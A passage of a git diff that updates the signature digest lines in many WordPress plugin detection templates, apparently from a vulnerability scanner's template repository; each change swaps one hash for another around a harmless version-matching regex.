@@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b32af961336b93eacd46af5a2db08e383ae6be287bc2da352eaca8a29ddcc3e2022100da48ff6a52dc32ee2f76f3405d1bc5ec6fdae94eb7805a8e75ab400f5caf0cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f140eca04450526be69df9d41ff321363a4ca7d9cf52300536baa669ad93e1f0022100f4bb47b9f810aff7de0ef0c4e490e128c47d4bddaa45c31d345b5859bfeb647e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 91104f922f..eebac18de1 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220294194b708bc6f5170a2df65285244d5780afe551274213a8b470b2c0ebd86540220150b404eb76aac3894b8b0ee0d566b554bd60cf8400102dd5494ca6cf1abb7fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201544a6e20fb80f844e5b8beeb2adc257d36bc962f3fb546ae66aec80be1a96140220373231a59673a8347c4ee2f31d6d81a248e4a134cc95e88d4fa72a010531d955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ecb8869561..61a21ec216 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022023149226ecc86d35627b69e689e044815a892eb75590ada8e56938719c29b362022100bfdeaa15a7b4b785b023c8e02c28e801494ee3cda2ebf255090eca17a86ba098:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022075c4855dfc42df5fc4df9bf8ad828f5fa5d6a32095506fbd2b339a048d852333022100a0e44437834841ed62013140ea3e1251a12973d3aad56286890a1e5c164a12b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 8c665bf2e6..e780cba596 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c38f67775e6c0a0aa6614439d0b30d971ef33e4c393f4d31c2117a7083a087e9022100aa453516b2bc51bd7a47e46a535a48cf501a2c1339771ee4c1ef844a119dee14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097c30988c1e54010f544e56d3652b7fffe5947f9950ff3ed3ec444dcc8fa72da02207dfa968ea5322e8ff4e064a1cb056e21102f44be82d7f238af6512be6ba1cae4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index a8f591bfa0..982a1bd8ab 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200a4a2d26a1e239f2803312503c96164f7d5962caef75a198970ad4827273cdf8022100abdb9710732dbb68cd5dff499b8d221880f402c64be07b305fb9f95b967ff48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f103721f7b914444b0596825860e03a313bdfcd0c4b1d753160282a46e5232c5022053dd231e9325c470691a8fa2725d850554646da6ab4e937aaa202996a0e6852e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 0a48dd7f68..098440f4ca 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022077a46c2ae46e4544092ef02086962d9fc0e3e97704ac3849c3fb24e94d5bc226022006278c41280acbe4c824fa2d8282bd876b581e729c62b57f8899e49b0e2fec7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edcf4d1dade562052c5e90cfec3d6edb039a3239c7c2501e46f00b28921a1806022064556c8d6439a32975e73b3be8daeb4a4acfb37420f6e605a5b6d0b2442521d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index f937ab086a..15ae25e3aa 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c8b324217af734ef27f3e46e873a39a92b9b6d38bd10f08b5069a108990cfb2402207a673929977eda22f74c9e8d085161a1b4bee88679814a82bea1d8abe5d61f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049893a0dd341e232d0a09ec0516243cc8d018294a5620359f066c00846a84732022100d07ad8c986cba1b1c33e12762362c7fbe317e0607c6c61ccdbd7e8efe218970d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 5369ca81b0..4c1783e7c6 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206cebe2f6c61fa2c36218c8f6ad2e77ec29651eea82dd1a41bcc9d9151f145832022041da4b3323b8259a3bd11745c0f3585ecba4d852ebb5e2c2615251512eca24e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100879b7486503359e040615b93a3161f7a05d38971da54aec88032f78de5a34f0302205bca172f0e24bac4d0287d58355be1a66bfe249874490ea5af422c98000a4953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index cd8d75dcfc..1c8a2c95d4 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203a336bbcacba743252a944de6aa0bb19574e63d15cdeecc74cc628502364228302205ca46efc17afbebe17719b9d6294a105d4de6f1320114c88faf06082cfd0212c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069627cb1f9e2e11e75a6bf5d77c421db20c663a8e9e05a7c9dc9f47a9792d72802202e2667217062a5d82493ef5c2e28931ef66097673984fb5efc6a8e423aceab9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 618f761873..23368a6323 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a0cf2514da7fde0c1913271fe646431da9da7956ba3dcdf16a97a739f3ad17bb02203f051cf3fa42eed824acbd1811b56c4c5060640e98aab276fee7b4fb67926cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006dc2a2acfb6659cfced35bafc26e01969778ffdf4f2aa765aa7f921c54ac23c022021b40a2243ead7450711e52b5809e02eaf2794d169bcc55c21f539b286b7f0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 7b701b85a7..76c259e7ba 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aae316a99383bc8e6dc7d1ca2761393625e84cacb96c763950918e6152dd5d3a022100c49f43ca5ff4436ebd12be8d3c7decbdc494e5956aafd246daf0a799d4c32323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001438ff7f23081da5f5aa74407b91a829973ed0f35a9e355d97a081655bbc0bc022100ae965608ad530269c7e14c0ec58ed9eb868e03c83cfc1d4aabe8ef7aff3557f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 6ae33db2ee..1f63424096 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d949bc67d571c3fc6492b756b1ebaa33385f35e8648489d79a8a3e1c709cd6b3022100e78184ff76c37bb3586efb695d3f9ac3afa894ce3bc8d1fa09d793a6817647f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070c5b505cc3b09c9fb593d252f2b47bbb7564f8ffa51a32602eacde1e46149e9022044c5187a56d819129710d1b6ca8721577108ec1f8ad08f4da2499dfcd2f20c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 3794a918be..239a12c68b 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cb77e39e715727c1422a9594982fcdd5b809ad6c00de6cadbc49add4e2c8cca70221009075af63c1484dab45d95b7f51924d9f4abdba3045b1ddb964b5213d46fbfa7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc4d052630fa999f68390fd6554a22c779ddc40031c52aa255472f68a5d51fcf022100d61ae4f216bb23375c183b5f0594c00a0f4c1d352123c88189c381abb686332b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 5385116d48..e7f70d757f 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022073640cbdeb4bd4f6165fc32f3bfe39d92d9d1638da88102bcb2924cd5fad1a440221008fe17a3561bf746908cea5fa034c30dc341cfbdb63f181868d5a476f3b09055c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c97fdf7396edc3643d621ef27f637d40a20f35501550848e3d5ac276d420b8b5022071f42e4687ff2514fea8cb7606c95751f1fd59d12c441c33765cf6bed17ddbd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index f57d3f09fe..93ef414e77 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e4c269455af789375ab6fb5b25bcd416f8d1b44ba3acf09926c0fe0136b2517c02204f14ea73fc5010a0e2597352009c01d8448bb6f147a8b766466eab0db61b90db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c67a888b63a21029b10528053b013ac6ce479d4a4e5cb6dee67fc58af1700c73022100c5923911e0aeecf1f302b2cf1a56e7af33b3b5b54c8cb644e62a3874c27f743e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 81e6704f93..2d1eae3237 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022015879418c9735e6c935b8c115a24b6a1e6890d3522e4df8dd30622d470bbc845022100c27aaf04d7244aba795c16138a8ed055aaaebfbc7c76bb8ffd756a9810fb028c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206752c6cebd9d560ad72555726279365551ae3a2e12c88e031ad1c62b3200ab8002201a5be6ca72dd8a1966f80f9b9b8df6dc5ad676e0edeb33b134ee7e355ff77323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index c8a9e82dbe..145ce68373 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220686fe2cc1d1be9539103dc74cc4bee7730dda7060e46c2f2d98b5148b93b21c8022100d5c791ebea56e6f33c778fc35ba9d78c71ace4fc67a443e3d7a5e28a283346af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206eaa2bec04165e2c2039b55848d220cd07a03807c1aa2e5114fad5a8f35298e902201360e826919d174a76270ab20d94674c82d24c4d37450bd785eb6f510d54b4db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index c8af5800ec..b3ec16caed 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aa4f1bf1da25742f598d6fb987c080e09fe780c40ca5e41adbe9745f2964029a0221009ec475b4ed87aab7bf2fd0589e40819a09ff4cc332b8910bd98661099c1fe558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db335f79bf73511102ca6db506f329bdf662aa433b4edf1172345811e47baa0202207007bf40af0754aa1eabc9a1762d8bea129a58be31f31529d4af41db18c4837f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 3773283051..1be5e13c7e 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d9514fe85da6636ea82824b5549b44d49fb749aeb80fc638a6252a537dad816b02201dbc39e0b40847e6c868c8be6250c732b730e1964c50bacd1ecdb10df561245b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6e413416c598d3e5a8551d4da6b2cd4a5634666d6f40edd9855b42b028927e0022100c3f7bd6d45aab5092c46e424a18c8c521b548d3dca3327b20f53f19a87465280:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 2aa65bc196..044822deb3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200bdc40640a9e84eed009bdfb1e0322b52c0a0317773cfe3ad79f825fbf976f7f0221009823704ca3d196c66224fd548d727ece5400f4f3fb66c73a6860e295daf3f1a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100882a6511eb04bfbe8f7574cb45051da1bbb4b4b94acb9fac82e551dd48e27f7a022100c5fe4340ff180e462304763854c7c47073449b8a0c8c7b322939aa8d5ba31c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index d709c52217..96322cc025 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207926be8588e1fb005a8401af0031599376609549e4468ce8fa24b8588181593d022100a10a0a594cf376956aed7d6dd13c2195b90740e54a7aef6026572ed3219717c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032e1f106796818eaab26de584c7444f97ea2e648ab10685047cca1d4c1f00c77022053c5dba53b36c000d772828405e961d68181cfd94b397cc04adca2856cd4ade6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index d58811b2b2..e341a35c79 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008f662888df0a2da8bb2a9626478edd3bff565fe29676b69e75f740a5e4020256022100bab59867e9552a2106cf9755f79fa5006d8c0021e4f49e432658cbfe1c31244f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9b16425abbde2aee8de64a5f17c1432c965ee6c15ea125a0b6ec58e465d97d00221008334935cd4e81bc80731d9c7d99e73a0d4372f14d90466795135b90686079850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 419b1b038d..1c708cbcd5 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201f4e5e1ecce440cc84cf76cbb9c22250863d51a135464590f10d931795bfc2fa02200208c98dffa3a84ec1d6c370bf3bb39b530421167e1c8195cc85988effa262ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066317753531605268a6d9d7f98f488a53e0c396fd8e12d67dffcf73e0b57c5af022074a32d932de755336aaa905afdff1131604f915fe5a43f809cff296302d8b4e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 4bfaebe064..25694b165f 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d55706a91ba516e9948723578fc58b7ee0cfa7c12ae29cd9e65789676ad2c79d022100f63f3b407150f40f5712a2d8cb4877e4cc9d59855e7be45a4ce49d5d2b55796f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220670d9c1b517c35d04c29a63bf1ac0086f098f35c666d92a0a260be1bab486dae022032beaba7e4bbce10cf56cb81b460b29f4e2d66f2b860971515efdb0cecf34ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 1be82048be..162d5c4479 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b807fd4d3a115f3495a938b1f087506403feeb2dec0a0c9b99f9413fd9018083022100eeb1f342a863e766246199d042144b84df334270ca6054e2d8678d4a6601cf57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b8900d9a1f6b22434c27f43a5d6f00327f130b16a013a0c29d1cce908e87e59022100c74056d124b3194544868db8273f8ebb5e00fd5d7bd7ac479281317c722075f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 361b7a4e45..ed499c2f06 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ff8f9c733ecf9fd4bff3a20c56945a9ef277d1345f815f84b5318a996fc2ce02022100dc5a39f9c0eb863ed0f5b011df5c47360f7ed013f823b7e6df04390dced89984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef772085bb281879eee2d3c4b12de6f0c8755d55d9e3826e89843ac3173d428c0221009d1ead4524bef4596336b8c6575719c0c91c08d949aad750b64d6990b5b4ba09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 3a98eddd8e..d1ec82d709 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ec8ead359cf71e47c932b67d598e80f5b30d89faeb087746cce63fcbe259a577022100af5f2062017aa57b338f0812079c49c594571437adae342c6835bbe65569659d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012c9796f40b8aba09086eec6d4221d9d3b4c1f0cbeb8d95351e52cbde15dd3a5022100b54516a16a5a70f942e597c7b83431610a78574576e51e6da19ce86de091ad7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 810ceb9b3c..54a4d28f42 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008ef13c796b46da0f618ef774d0ddb31c00537be2b196646c2c1c3dadfd507db502200a071fe205a9e3d377ecc7fde3760b65cd12102a69106cd5bbd7bd9b2164d1fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf19c0bddd8f9eeb1d0a4f13f60cd32b44f400eef8983f6d81b03b45a05753a902203c4d1823c972911526814400e010a7c1a0f1e4a5d725923db4538e310758167f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 09c3ee2725..6127d033c3 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022040c6bf0d14acbdc357ceb9a605555df0497ff69fc2edfc2f7ad4a99a65f01c0e02207fd381c50ebf8a1c3259cc672c77ef30377146d3757b07946e58e68f1c1afe42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca4fcaf2ca29499cb2742c9f74d7ed2be490bc6eb27e02569553c572208459e30220525a310a4e92abcb33ac4c86ef9bb0342031d60f44a7c7e67909b408bece875b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index f3e95d8317..40588f2daf 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200ddc7b22008dd30b3c4ad2c2cf63ffe313934f985c637a3be4f7166a424876d5022033684bd2fafa32eea2727f6aa15f604f478b7af3bbbd1a8f5f57ab2c1b69c6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd5a12abf2ef32b4be59ea2e6786251b1522722a8df32c5c8495fb287d5f480702200bee287365d6cb79600f686c58474c584eb2351fa362df6c3dfddfa41fc26fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 5a9b7f847a..97c4bef856 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022058a5a85a87d18c0738d581eebf650b95e7405f3ff6c44a3de8eefb586b73ae8202207c431cde4a559c5e889cb8f15231a4b0cd70b992b6c06272a3e0b34214393ba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086ce1daa8cc7839f566d1b7139847dea33da144bb319699f7c59b800bb5f292a022038ea16efb1a28787aaf5181e7c69dffc9441e2f335ad177db4db5651119b63ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 5df649e063..f204fe0946 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210091550041992951441ec424c88635110a41b74b1fb134a75ad615c48143dff698022016e0e8711d2e6c3c411eb900c1158341d2168f86a61267d1edd24d234914cace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220743c89b30616463bcf86935a9de79f20845c7019d53186ae4bd81159040cdc690220286bc897812176a9f48f385d6139014bf324196b6307579f149a7f40c9ce51f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 1316075dd4..a9c14057be 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b5d1c4fe8c4af5bd1986f767bc4c4bba1c8a789dbf6fefad86fdac714f939ef2022058ade8e5275e938ab907532324b7d874e51578be4f0d61834b52be0d56b0719b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002c40a8aa55ad96ef364bc93b7bd332fb3de877a1dbbf738733d24cd3247daa302210088772e7997429224cf8ec07a4ff5d5ac9c59e5c1802a7600cbe859c20c99a11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index c975139942..e557cb2697 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008b3a3d9ef0f8e58a1742e425293c48fd670bbfc855f339c3e734655efb7bca8f0221009eff20887a18d4cf124f354ac433406cfc851a5c056a438ce911bc55aa1f1137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f85a4b2115334ef889acbca00448f27db418b08459512cea5afd5a38a2ebd958022022c2b52ed1e1dd43cc810980afac6c00727e96425143c6341627c5997febd34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 1f571957a5..1bad84ebc7 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - 